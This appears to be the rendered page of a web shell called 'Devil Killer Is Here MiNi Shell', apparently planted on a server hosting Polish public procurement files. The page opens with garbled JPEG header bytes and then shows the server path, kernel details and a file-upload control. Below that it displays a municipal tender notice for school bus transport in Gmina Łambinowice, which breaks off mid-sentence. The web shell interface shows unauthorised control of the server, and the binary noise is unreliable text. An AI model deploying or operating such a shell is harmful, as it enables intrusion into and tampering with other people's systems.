JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250616/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250616/0028045901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowóz uczniów i dzieci do szkół podstawowych i przedszkoli na terenie Gminy Łambinowice oraz dowóz uczniów do szkoły w Nysie.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Łambinowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412846</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Zawadzkiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łambinowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">48-316</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@lambinowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lambinowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowóz uczniów i dzieci do szkół podstawowych i przedszkoli na terenie Gminy Łambinowice oraz dowóz uczniów do szkoły w Nysie.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d9db2de1-914b-40f1-b750-9feb6a89bf95</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00280459</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00032152/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczniów do szkół i placówek oświatowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lambinowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, odbywa się w języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/lambinowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC, dowolny system operacyjny w wersji umożliwiającej zainstalowanie dowolnej przeglądarki<br/>internetowej (każdej innej niż przeglądarka Internet Explorer), z włączoną obsługą języka JavaScript, akceptującej piliki typu „cookies”,<br/>c) zainstalowane oprogramowanie do odczytu plików w formacie .pdf,<br/>d) wyświetlacz ekranowy umożliwiający pracę w rozdzielczości nie niższej niż 1024x768 pikseli<br/>e) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.,<br/>f) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/lambinowice<br/>3.W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między Zamawiającym, a Wykonawcami w zakresie:<br/>a) przesyłania Zamawiającemu pytań do treści SWZ;<br/>b) przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>c) przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/ poprawienia/ uzupełnienia oświadczenia, o którym mowa w art.<br/>125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>d) przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w<br/>art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w<br/>postępowaniu;<br/>e) przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;<br/>f) przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>g) przesyłania odwołania/inne<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>4.W sytuacjach awaryjnych w szczególności w przypadku braku działania platformy zakupowej platformazakupowa.pl , Zamawiający dopuszcza także komunikację za pośrednictwem poczty elektronicznej, na adres: zpi@lambinowice.pl , z zastrzeżeniem, że Ofertę Wykonawca może złożyć wyłącznie za pośrednictwem platformazakupowa.pl<br/>5. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w zakładce “Wiadomości – komunikaty publiczne”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy za pośrednictwem zakładki „Wiadomości – wiadomości prywatne”.<br/>6. Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych w SWZ.<br/>7.Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi maksymalnie 5MB.<br/>8.Oferta powinna być:<br/>1) sporządzona na podst. załączników do SWZ, w j.polskim<br/>2) złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest GMINA ŁAMBINOWICE, UL. TADEUSZA ZAWADZKIEGO 29,48-316 ŁAMBINOWICE;<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mai: iod@valven.pl ; <br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem pn.:„ Dowóz uczniów i dzieci do szkół podstawowych <br/>i przedszkoli na terenie Gminy Łambinowice oraz dowóz uczniów do szkoły w Nysie”<br/>o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>3)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP.<br/>4)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy PZP., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>6)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>7)	posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8)	nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>9)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Dowóz uczniów i dzieci do szkół podstawowych <br/>i przedszkoli na terenie Gminy Łambinowice oraz dowóz uczniów do szkoły w Nysie. Zamówienie jest podzielone na dwie części.<br/>I część zamówienia:<br/>Część pierwsza obejmuje dowóz uczniów i dzieci do szkół i przedszkoli z miejscowości:<br/>- Autobus nr 1- Dworzysko, Szadurczyce, Sowin, Wierzbie, Łambinowice, Okopy, Bielice, Malerzowice Wielkie- zgodnie z przyjętym planem 4-tras dowozu- 130,50 km;<br/><br/>- Autobus nr 2- Jasienica Dolna, Budzieszowice, Malerzowice Wielkie, Bielice, Piątkowice, Lasocice, Drogoszów- zgodnie z przyjętym planem 4- tras dowozu- 132,00 km.<br/><br/>Łączna dzienna ilość kilometrów dla wszystkich tras wynosi 262,50 km.<br/>Ilość osób przewożonych na trasie, zgodnie z załączonym rozkładem jazdy, jest zmienna i ze względu na osoby wsiadające i wysiadające może w sumie dziennie wynosić nawet 171 osób (tej liczby nie przekroczy), jednakże w tym samym czasie w autobusie nie będzie przewożonych więcej niż 55 osób, dlatego wykonawca ma obowiązek użycia pojazdu co najmniej 55 osobowego, w tym z 44 miejscami siedzącymi.<br/>Propozycja rozkładu jazdy części pierwszej zamówienia, z której wynika ustalona dzienna ilość kilometrów poszczególnych pojazdów, znajduje się w załączniku nr 12 do Specyfikacji Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Wartość tych zamówień ustala się na nie więcej niż 10% wartości zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie te oferty, które zostaną złożone przez Wykonawców niewykluczonych przez Zamawiającego z niniejszego postępowania oraz nie zostaną odrzucone przez Zamawiającego.<br/>Zamawiający wykonuje po ocenie ofert pod względem przedmiotowym (weryfikacja zgodności oferty z przedmiotem zamówienia, prawidłowość złożenia oświadczeń woli, poprawienie omyłek, badanie w zakresie zastrzeżenia tajemnicy przedsiębiorstwa, badanie w kierunku rażąco niskiej ceny itp.) oraz po ustaleniu na podstawie kryteriów oceny ofert określonych w dokumentach zamówienia, rankingu wykonawców i wyłonieniu wykonawcy, którego oferta została uznana za najkorzystniejszą. Zamawiający po wyłonieniu Wykonawcy wzywa go do złożenia podmiotowych środków dowodowych zgodnie z art.274 ustawy PZP.<br/><br/>1.	Kryteria oceny ofert:<br/><br/>a)	Cena brutto „C” – waga kryterium: 60%, maksymalna ilość pkt. 60 <br/>Ocena kryterium „cena” odbędzie się na podstawie ceny brutto podanej w ofercie. Ilość punktów zostanie obliczona wg wzoru:<br/><br/><br/> najniższa oferowana cena spośród wszystkich ważnych ofert<br/> C = ………………..…….………………………………………………………….… x100 x 60%<br/> cena badanej oferty<br/><br/><br/>C- liczba otrzymanych punktów w kryterium cena ofertowa brutto<br/>100- stały wskaźnik<br/>60% waga kryterium<br/><br/>Osiągnięta wartość procentowa według powyższego wzoru będzie odpowiadała uzyskanej liczbie punktów. Maksymalnie w tym kryterium można uzyskać 60 punktów.<br/><br/>b)	Parametry techniczne „T”- waga kryterium: 20%, maksymalna ilość pkt. 20<br/>Ocena kryterium „parametry techniczne” odbędzie się na podstawie wyposażenia autobusu:<br/>-	sprawne ogrzewanie / klimatyzacja - 10 pkt<br/>-	nagłośnienie umożliwiające kontakt opiekuna z dziećmi - 10 pkt <br/><br/>c)	Kryterium „postępowanie w sytuacjach awaryjnych” „A” (czas podstawienia pojazdu zastępczego) – waga kryterium 20%, maksymalna ilość punktów 20<br/>W zakresie kryterium czas podstawienia pojazdu zastępczego „A” – nie krótszy niż 30 minut i nie dłuższy niż 90 minut<br/>Zamawiający dokona oceny tego kryterium następująco:<br/>Czas podstawienia pojazdu zastępczego, wyrażony w minutach liczonych od momentu stwierdzenia awarii, będzie wynosił 30 minut otrzyma najwyższą liczbę punktów, pozostałe proporcjonalnie mniej, wg wzoru:<br/><br/> Czas podstawienia pojazdu zastępczego 30 minut<br/> A = …………………………………..…….……………………………………… x100 x 20% Zaproponowany czas podstawienia pojazdu zastępczego<br/><br/>A – liczba otrzymanych punktów w kryterium czas podstawienia pojazdu zastępczego<br/>100 – stały wskaźnik<br/>20 % - waga kryterium<br/>Ocena ofert przy zastosowaniu kryterium numer 2 b) i c) zostanie dokonana przez Zamawiającego na podstawie informacji zamieszczonych przez Wykonawcę w formularzu oferty. Wykonawca zobowiązany jest samodzielnie uzupełnić w Formularzu oferty oferowany czas podstawienia taboru zastępczego i dokonać wyboru dotyczącego parametrów technicznych. Jeżeli Wykonawca nie uzupełni lub uzupełni innym czasem/lub innym parametrem technicznym wymagane pola w ofercie, Zamawiający przyjmie 0 pkt. za te kryteria.<br/>2. Wynik<br/>Uzyskana z wyliczenia ilość punktów w poszczególnych kryteriach zostanie ostatecznie ustalona z dokładnością do dwóch miejsc po przecinku z zachowaniem zasady zaokrągleń matematycznych.<br/><br/>Ostateczna ilość punktów zostanie obliczona poprzez zsumowanie punktów uzyskanych w poszczególnych kryteriach według wzoru:<br/>LP=C+T+A<br/><br/>Wybrana zostanie oferta, która uzyska najwyższą ilość punktów.<br/>Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Zamawiający udzieli zamówienie Wykonawcy, którego oferta odpowiada wymaganiom ustawy PZP i niniejszej SWZ oraz zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne „T”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„postępowanie w sytuacjach awaryjnych” „A”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć II zamówienia - Dowóz uczniów z terenu gminy do Zespołu Placówek Specjalnych w Nysie. <br/>Realizując II część zamówienia Wykonawca, będzie przewozić dzieci z miejscowości: Wierzbie, Sowin, Łambinowice, Budzieszowice, Drogoszów, Malerzowice i Lasocice do Nysy, ul. Grodkowska 54 jednym kursem dowozu i odwozić po zajęciach do w/w miejscowości (trasa powrotna) realizując w tym celu jeden kurs odwozu w ciągu dnia. Zatem trasa II części zamówienia obejmie:<br/>- zebranie i dowóz dzieci do Nysy z poszczególnych miejscowości: Wierzbia, Sowina, Łambinowic, Budzieszowic, Malerzowic, Drogoszowa, Lasocic – 49,40 km;<br/>- odwóz uczniów ze szkoły z Nysy do miejscowości zamieszkania tj.: Lasocic, Drogoszowa, Malerzowic, Budzieszowic, Łambinowic, Sowina, 